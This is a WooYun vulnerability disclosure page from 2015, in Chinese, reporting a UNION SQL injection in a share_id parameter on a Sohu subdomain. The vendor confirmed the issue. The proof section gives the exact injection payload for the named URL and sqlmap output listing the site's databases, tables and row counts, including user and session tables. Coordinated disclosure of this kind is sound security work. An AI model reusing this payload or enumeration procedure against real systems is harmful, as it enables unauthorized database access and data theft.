搜狐某站union注入（直拿数据） | wooyun-2015-0147899| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147899

漏洞标题：搜狐某站union注入（直拿数据）

漏洞作者： Manning

提交时间：2015-10-20 09:39

修复时间：2015-12-04 10:02

公开时间：2015-12-04 10:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-20：细节已通知厂商并且等待厂商处理中
2015-10-20：厂商已经确认，细节仅向厂商公开
2015-10-30：细节向核心白帽子及相关领域专家公开
2015-11-09：细节向普通白帽子公开
2015-11-19：细节向实习白帽子公开
2015-12-04：细节向公众公开

简要描述：

搜狐某站union注入（直拿数据）

详细说明：

http://fx.svip.sohu.com/oauth.php?share_id=1

漏洞证明：

Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: share_id=1 UNION ALL SELECT NULL,CONCAT(0x716a767171,0x61736e6b6f5a52514550,0x71766b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
[22:22:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.2.8
back-end DBMS: MySQL 5.0
[22:22:17] [INFO] fetching database names
[22:22:17] [INFO] the SQL query used returns 3 entries
[22:22:17] [INFO] resumed: "information_schema"
[22:22:17] [INFO] resumed: "svip"
[22:22:17] [INFO] resumed: "test"
available databases [3]:                                                                                                                                                                                                                   
[*] information_schema
[*] svip
[*] test
[22:22:17] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[22:22:17] [INFO] fetching tables for databases: 'information_schema, svip, test'
[22:22:17] [INFO] the SQL query used returns 63 entries
[22:22:17] [INFO] retrieved: "information_schema","CHARACTER_SETS"
[22:22:18] [INFO] retrieved: "information_schema","COLLATIONS"
[22:22:18] [INFO] retrieved: "information_schema","COLLATION_CHARACTER_SET_APPLICABILITY"
[22:22:18] [INFO] retrieved: "information_schema","COLUMNS"
[22:22:18] [INFO] retrieved: "information_schema","COLUMN_PRIVILEGES"
[22:22:18] [INFO] retrieved: "information_schema","ENGINES"
[22:22:18] [INFO] retrieved: "information_schema","EVENTS"
[22:22:18] [INFO] retrieved: "information_schema","FILES"
[22:22:18] [INFO] retrieved: "information_schema","GLOBAL_STATUS"
[22:22:18] [INFO] retrieved: "information_schema","GLOBAL_VARIABLES"
[22:22:18] [INFO] retrieved: "information_schema","KEY_COLUMN_USAGE"
[22:22:18] [INFO] retrieved: "information_schema","PARTITIONS"
[22:22:18] [INFO] retrieved: "information_schema","PLUGINS"
[22:22:18] [INFO] retrieved: "information_schema","PROCESSLIST"
[22:22:18] [INFO] retrieved: "information_schema","PROFILING"
[22:22:18] [INFO] retrieved: "information_schema","REFERENTIAL_CONSTRAINTS"
[22:22:18] [INFO] retrieved: "information_schema","ROUTINES"
[22:22:18] [INFO] retrieved: "information_schema","SCHEMATA"
[22:22:18] [INFO] retrieved: "information_schema","SCHEMA_PRIVILEGES"
[22:22:18] [INFO] retrieved: "information_schema","SESSION_STATUS"
[22:22:18] [INFO] retrieved: "information_schema","SESSION_VARIABLES"
[22:22:18] [INFO] retrieved: "information_schema","STATISTICS"
[22:22:18] [INFO] retrieved: "information_schema","TABLES"
[22:22:18] [INFO] retrieved: "information_schema","TABLE_CONSTRAINTS"
[22:22:18] [INFO] retrieved: "information_schema","TABLE_PRIVILEGES"
[22:22:18] [INFO] retrieved: "information_schema","TRIGGERS"
[22:22:18] [INFO] retrieved: "information_schema","USER_PRIVILEGES"
[22:22:18] [INFO] retrieved: "information_schema","VIEWS"
[22:22:18] [INFO] retrieved: "svip","huigu_node"
[22:22:18] [INFO] retrieved: "svip","mytest"
[22:22:19] [INFO] retrieved: "svip","svip_gift"
[22:22:19] [INFO] retrieved: "svip","svip_gift_count_logs"
[22:22:19] [INFO] retrieved: "svip","svip_gift_items"
[22:22:19] [INFO] retrieved: "svip","svip_gift_items_1"
[22:22:19] [INFO] retrieved: "svip","svip_gift_templates"
[22:22:19] [INFO] retrieved: "svip","svip_group"
[22:22:19] [INFO] retrieved: "svip","svip_groupright"
[22:22:19] [INFO] retrieved: "svip","svip_grouprole"
[22:22:19] [INFO] retrieved: "svip","svip_logs"
[22:22:19] [INFO] retrieved: "svip","svip_poll_logs"
[22:22:19] [INFO] retrieved: "svip","svip_right"
[22:22:19] [INFO] retrieved: "svip","svip_role"
[22:22:19] [INFO] retrieved: "svip","svip_roleright"
[22:22:19] [INFO] retrieved: "svip","svip_sessions"
[22:22:19] [INFO] retrieved: "svip","svip_share"
[22:22:19] [INFO] retrieved: "svip","svip_share_follow"
[22:22:19] [INFO] retrieved: "svip","svip_share_font"
[22:22:19] [INFO] retrieved: "svip","svip_share_items"
[22:22:19] [INFO] retrieved: "svip","svip_share_pic"
[22:22:19] [INFO] retrieved: "svip","svip_share_post"
[22:22:19] [INFO] retrieved: "svip","svip_share_record"
[22:22:19] [INFO] retrieved: "svip","svip_tabuword"
[22:22:19] [INFO] retrieved: "svip","svip_user"
[22:22:19] [INFO] retrieved: "svip","svip_usergroup"
[22:22:19] [INFO] retrieved: "svip","svip_userright"
[22:22:19] [INFO] retrieved: "svip","svip_userrole"
[22:22:20] [INFO] retrieved: "svip","svip_wish"
[22:22:20] [INFO] retrieved: "svip","svip_wish_items"
[22:22:20] [INFO] retrieved: "svip","svip_wish_record"
[22:22:20] [INFO] retrieved: "svip","svip_wish_templates"
[22:22:20] [INFO] retrieved: "svip","svip_wish_userlog"
[22:22:20] [INFO] retrieved: "test","svip_gift"
[22:22:20] [INFO] retrieved: "test","svip_gift_items"
Database: svip                                                                                                                                                                                                                             
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| svip_share_record                     | 326770  |
| svip_sessions                         | 76541   |
| svip_userright                        | 41951   |
| svip_logs                             | 26990   |
| svip_poll_logs                        | 21309   |
| svip_wish_record                      | 17734   |
| svip_gift_items                       | 13870   |
| svip_gift_items_1                     | 13594   |
| svip_userrole                         | 5225    |
| svip_usergroup                        | 4607    |
| svip_share_post                       | 3811    |
| svip_gift                             | 2275    |
| svip_user                             | 1449    |
| svip_gift_templates                   | 1286    |
| svip_share_items                      | 496     |
| svip_wish_items                       | 475     |
| svip_wish                             | 206     |
| svip_grouprole                        | 143     |
| svip_wish_templates                   | 83      |
| svip_right                            | 81      |
| svip_tabuword                         | 79      |
| svip_roleright                        | 71      |
| svip_group                            | 48      |
| svip_groupright                       | 48      |
| huigu_node                            | 29      |
| svip_share                            | 16      |
| svip_share_font                       | 12      |
| svip_role                             | 7       |
| svip_share_pic                        | 5       |
| mytest                                | 1       |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| svip_gift_items                       | 3812    |
| svip_gift                             | 890     |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 585     |
| GLOBAL_STATUS                         | 267     |
| GLOBAL_VARIABLES                      | 267     |
| SESSION_STATUS                        | 267     |
| SESSION_VARIABLES                     | 267     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| STATISTICS                            | 81      |
| PARTITIONS                            | 63      |
| TABLES                                | 63      |
| KEY_COLUMN_USAGE                      | 37      |
| TABLE_CONSTRAINTS                     | 37      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 18      |
| PLUGINS                               | 9       |
| ENGINES                               | 7       |
| SCHEMATA                              | 3       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

修复方案：

过滤

版权声明：转载请注明来源 Manning@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-10-20 10:00

厂商回复：

感谢你对搜狐安全的支持。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147899

漏洞标题：搜狐某站union注入（直拿数据）

相关厂商：搜狐

漏洞作者： Manning

提交时间：2015-10-20 09:39

修复时间：2015-12-04 10:02

公开时间：2015-12-04 10:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Manning@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147899

漏洞标题：搜狐某站union注入（直拿数据）

相关厂商：搜狐

漏洞作者： Manning

提交时间：2015-10-20 09:39

修复时间：2015-12-04 10:02

公开时间：2015-12-04 10:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0147899"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Manning@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：